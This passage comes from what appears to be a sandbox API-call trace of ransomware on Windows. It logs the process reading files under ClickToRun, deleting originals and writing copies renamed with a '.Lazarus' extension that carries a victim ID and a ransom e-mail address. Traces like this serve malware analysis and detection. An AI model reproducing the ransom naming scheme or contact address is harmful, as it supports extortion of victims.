nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0095.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0095.662] CloseHandle (hObject=0x418) returned 1 [0095.662] AreFileApisANSI () returned 1 [0095.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0095.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82e68 [0095.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0095.662] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash")) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0095.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0095.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.664] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbc470d00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x0, cFileName="i641033.hash", cAlternateFileName="I64103~1.HAS")) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0095.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0095.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.665] AreFileApisANSI () returned 1 [0095.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", lpUsedDefaultChar=0x0) returned 71 [0095.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0095.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0095.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0095.665] AreFileApisANSI () returned 1 [0095.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0095.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0095.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0095.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0095.665] GetFileType (hFile=0x418) returned 0x1 [0095.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0095.666] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0095.666] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0095.666] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0095.666] CloseHandle (hObject=0x418) returned 1 [0095.666] AreFileApisANSI () returned 1 [0095.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0095.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0095.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0095.667] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0095.667] GetFileType (hFile=0x418) returned 0x1 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0095.667] CloseHandle (hObject=0x418) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0095.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.668] AreFileApisANSI () returned 1 [0095.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0095.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0095.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0095.669] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbc470d00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66)) returned 1 [0095.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0095.669] AreFileApisANSI () returned 1 [0095.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0095.669] GetLastError () returned 0x0 [0095.669] SetLastError (dwErrCode=0x0) [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0095.669] GetLastError () returned 0x0 [0095.669] SetLastError (dwErrCode=0x0) [0095.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a9b0 [0095.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0095.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0095.670] AreFileApisANSI () returned 1 [0095.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 133 [0095.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10a) returned 0x8b8b0 [0095.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8b8b0, cchWideChar=133 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 133 [0095.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0095.670] GetFileType (hFile=0x418) returned 0x1 [0095.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0095.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0095.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0095.670] AreFileApisANSI () returned 1 [0095.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0095.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0095.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0095.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.671] GetFileType (hFile=0x33c) returned 0x1 [0095.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0095.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0095.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0095.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0095.671] GetLastError () returned 0x0 [0095.671] SetLastError (dwErrCode=0x0) [0095.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0095.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0095.671] GetLastError () returned 0x0 [0095.671] SetLastError (dwErrCode=0x0) [0095.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0095.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0095.671] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x66, lpOverlapped=0x0) returned 1 [0095.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0095.672] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0095.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0095.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0095.673] GetLastError () returned 0x0 [0095.673] SetLastError (dwErrCode=0x0) [0095.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf00 [0095.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0095.673] GetLastError () returned 0x0 [0095.673] SetLastError (dwErrCode=0x0) [0095.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0095.673] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x70, lpOverlapped=0x0) returned 1 [0095.674] GetLastError () returned 0x0 [0095.674] SetLastError (dwErrCode=0x0) [0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.674] GetLastError () returned 0x0 [0095.674] SetLastError (dwErrCode=0x0) [0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0095.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0095.674] CloseHandle (hObject=0x418) returned 1 